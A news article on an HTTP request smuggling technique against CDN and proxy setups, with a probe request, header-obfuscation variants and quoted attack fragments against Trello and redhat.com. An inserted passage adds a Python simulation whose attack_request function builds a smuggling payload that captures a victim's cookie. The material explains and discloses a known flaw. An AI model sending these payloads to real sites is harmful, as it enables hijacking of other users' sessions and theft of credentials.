Attack on front-end/back-end systems lets an attacker wedge into third-party requests

Details have been disclosed of a new attack technique against sites that use a front-end/back-end model, such as those served through content delivery networks, load balancers or proxies. By sending specially crafted requests, the attacker can wedge into the content of other requests that are processed over the same connection between the front-end and the back-end. The proposed method was successfully used to mount an attack that made it possible to intercept the credentials of PayPal users; under the programme for reporting unpatched vulnerabilities, the researchers were paid about 40 thousand dollars for it. The attack also works against sites that use the Akamai content delivery network.

The crux of the problem is that front-ends and back-ends often support the HTTP protocol to different degrees, yet at the same time multiplex requests from different users into a single channel. To connect the front-end that receives requests with the back-end that processes them, a long-lived TCP connection is established, over which user requests are passed along the chain one after another, delimited by means of the HTTP protocol itself. Two headers serve to delimit requests: "Content-Length" (giving the total size of the data in the request) and "Transfer-Encoding: chunked" (which allows the data to be sent in pieces, as blocks of varying size in the format "{size}\r\n{block}\r\n{size}\r\n{block}\r\n0", terminated by a zero-size chunk).

The problem arises when the front-end supports only "Content-Length" and ignores "Transfer-Encoding: chunked" (the Akamai CDN, for example, behaved this way), or vice versa. If "Transfer-Encoding: chunked" is supported on both sides, quirks of the HTTP header parsers can be used for the attack instead (for example, when the front-end ignores header lines such as "Transfer-Encoding: xchunked", "Transfer-Encoding: chunked ", "Transfer-Encoding:[tab]chunked", "X: X[\n]Transfer-Encoding: chunked", "Transfer-Encoding[\n]: chunked" or "Transfer-Encoding : chunked", while the back-end accepts and processes them).

In that case an attacker can send a request carrying both a "Content-Length" header and a "Transfer-Encoding: chunked" header, with the value in "Content-Length" larger than the chunked body: the chunked chain, ending in its zero-size chunk, is shorter than the number of bytes Content-Length announces. If the front-end frames and forwards the request according to "Content-Length" while the back-end determines the end of the body from "Transfer-Encoding: chunked", the back-end considers the request finished at the terminating chunk, and the remaining tail of the attacker's request is left on the connection as the start of the next request. In other words, the attacker can prepend arbitrary data to the beginning of the next request sent by another user over the same connection.


To detect the problem in a given front-end/back-end combination, you can send a request like the following through the front-end:

POST /about HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Content-Length: 4

1
Z
Q

The problem is present if the back-end does not process the request immediately but keeps waiting for the terminating zero-size chunk of the chunked data to arrive, which shows up as a delay in the response. For a full check, a dedicated tool has been prepared that also tries the possible ways of hiding the "Transfer-Encoding: chunked" header from the front-end.
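The desync mechanism described above and the timing probe just shown, as an added example that is not code from the article or from the researchers: a Python simulation in which a front-end framer that trusts Content-Length and a back-end framer that trusts a leniently parsed Transfer-Encoding header read the same byte stream. The strict and lenient header parsers are hypothetical models written for this example (they reproduce no named product), and example.com, the /admin and /home paths, the X-Swallow header name and the victim's session cookie are constructed values.

```python
"""CL.TE request smuggling, simulated (added example, not code from the article).

Two constructed framers read the byte stream on the shared front-end/back-end
connection: make_frontend() frames by Content-Length and, when told to honour
chunked encoding, recognises only an exactly spelled "Transfer-Encoding: chunked";
backend() uses chunked framing for any leniently normalised header that says
chunked.  Hypothetical parsers, modelling no named product.  Python 3.8+.
"""

CRLF = b"\r\n"


def split_head(data):
    """(head, body_offset), or None while the header block is incomplete."""
    end = data.find(b"\r\n\r\n")
    return None if end < 0 else (data[:end], end + 4)


def headers_of(head, strict):
    """Strict: split on CRLF only, drop leading spaces of the value, keep case.
    Lenient: also split on a bare LF, then strip and lower-case both parts."""
    lines = head.split(CRLF)[1:]
    if not strict:
        lines = [part.strip(b"\r") for line in lines for part in line.split(b"\n")]
    for line in lines:
        name, _, value = line.partition(b":")
        if strict:
            yield name, value.lstrip(b" ")
        else:
            yield name.strip().lower(), value.strip().lower()


def sees_chunked(head, strict):
    te = b"Transfer-Encoding" if strict else b"transfer-encoding"
    return any(n == te and v == b"chunked" for n, v in headers_of(head, strict))


def content_length(head, strict):
    cl = b"Content-Length" if strict else b"content-length"
    return next((int(v) for n, v in headers_of(head, strict) if n == cl), 0)


def frame_by_length(data, body_at, length):
    end = body_at + length
    return (data[:end], data[end:]) if len(data) >= end else None


def frame_by_chunks(data, body_at):
    """Consume chunks up to the terminating 0 chunk (trailers ignored)."""
    pos = body_at
    while True:
        nl = data.find(CRLF, pos)
        if nl < 0:
            return None                    # still waiting for a chunk-size line
        size = int(data[pos:nl].split(b";")[0], 16)
        pos = nl + 2 + size + 2            # size line + chunk data + CRLF
        if len(data) < pos:
            return None                    # still waiting for the chunk body
        if size == 0:
            return data[:pos], data[pos:]  # request ends at the 0 chunk


def make_frontend(honours_chunked):
    def framer(data, head, body_at):
        if honours_chunked and sees_chunked(head, strict=True):
            return frame_by_chunks(data, body_at)
        return frame_by_length(data, body_at, content_length(head, strict=True))
    return framer


def backend(data, head, body_at):
    if sees_chunked(head, strict=False):
        return frame_by_chunks(data, body_at)
    return frame_by_length(data, body_at, content_length(head, strict=False))


def split_stream(data, framer):
    """Frame consecutive requests; the leftover is what the parser still waits on."""
    requests = []
    while (parsed := split_head(data)) and (framed := framer(data, *parsed)):
        request, data = framed
        requests.append(request)
    return requests, data


# The article's timing probe, verbatim (body "1\r\nZ\r\nQ", Content-Length 4).
PROBE = (b"POST /about HTTP/1.1\r\nHost: example.com\r\n"
         b"Transfer-Encoding: chunked\r\nContent-Length: 4\r\n\r\n1\r\nZ\r\nQ")

# Constructed victim request that arrives next on the same back-end connection.
VICTIM = (b"GET /home HTTP/1.1\r\nHost: example.com\r\n"
          b"Cookie: session=victim-secret\r\n\r\n")


def probe_outcome(frontend):
    """Front-end forwards Content-Length bytes; back-end never sees a 0 chunk."""
    forwarded, unforwarded = split_stream(PROBE, frontend)
    done, waiting = split_stream(forwarded[0], backend)
    return {"forwarded_body": forwarded[0][-4:], "frontend_unforwarded": unforwarded,
            "backend_completed": len(done), "backend_still_waiting": bool(waiting)}


def attack_request(prefix):
    """Content-Length covers the 0 chunk plus the prefix, so the front-end forwards
    everything while the back-end stops at the 0 chunk.  The space before the
    colon hides the header from a strict parser but not from the lenient one."""
    body = b"0\r\n\r\n" + prefix
    return (b"POST / HTTP/1.1\r\nHost: example.com\r\nContent-Length: %d\r\n"
            b"Transfer-Encoding : chunked\r\n\r\n" % len(body) + body)


def request_lines(requests):
    return [r.split(CRLF, 1)[0] for r in requests]


def smuggle(frontend):
    """Request lines each side frames, plus the back-end's second request, which
    carries the victim's headers (and Cookie) under the attacker's request line."""
    stream = attack_request(b"GET /admin HTTP/1.1\r\nX-Swallow: ") + VICTIM
    front, _ = split_stream(stream, frontend)
    back, _ = split_stream(stream, backend)
    return request_lines(front), request_lines(back), back[1]
```

probe_outcome(make_frontend(False)) reports the back-end with zero completed requests and still waiting, which is the delay the probe relies on; smuggle(make_frontend(True)) shows the front-end framing a /home request for the victim while the back-end frames a /admin request that now carries the victim's Cookie header, even though this front-end does honour a correctly spelled chunked header.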

Carrying out a real attack depends on what the targeted site offers. When attacking the Trello web application, for instance, it was possible to replace the beginning of the next request (smuggling in data of the form "PUT /1/members/1234... x=x&csrf=1234&username=testzzz&bio=cake"), so that the third-party user's original request, together with the authentication Cookie it carried, was submitted as the content of that message. In the attack on saas-app.com, JavaScript code could be injected into the response by passing it in one of the request parameters. In the attack on redhat.com, an internal handler was used to redirect to the attacker's site (a request of the form "POST /search?dest=../assets/idx?redir=//[email protected]/ HTTP/1.1").

Applying the method to content delivery networks made it possible to simply swap the requested site by replacing the "Host:" header. The attack can also be used to poison the contents of caching systems and to extract confidential cached data. The high point of the method was an attack on PayPal that made it possible to intercept passwords entered by users during authentication (a request for an iframe was modified so as to execute JavaScript in the context of the paypal.com/us/gifts page, to which CSP (Content Security Policy) was not applied).

Curiously, a very similar HTTP request smuggling technique was proposed back in 2005; it allowed poisoning data in caching proxies (Tomcat, squid, mod_proxy) or bypassing firewall blocking by packing several "GET" or "POST" requests into a single HTTP session.

Source: opennet.ru
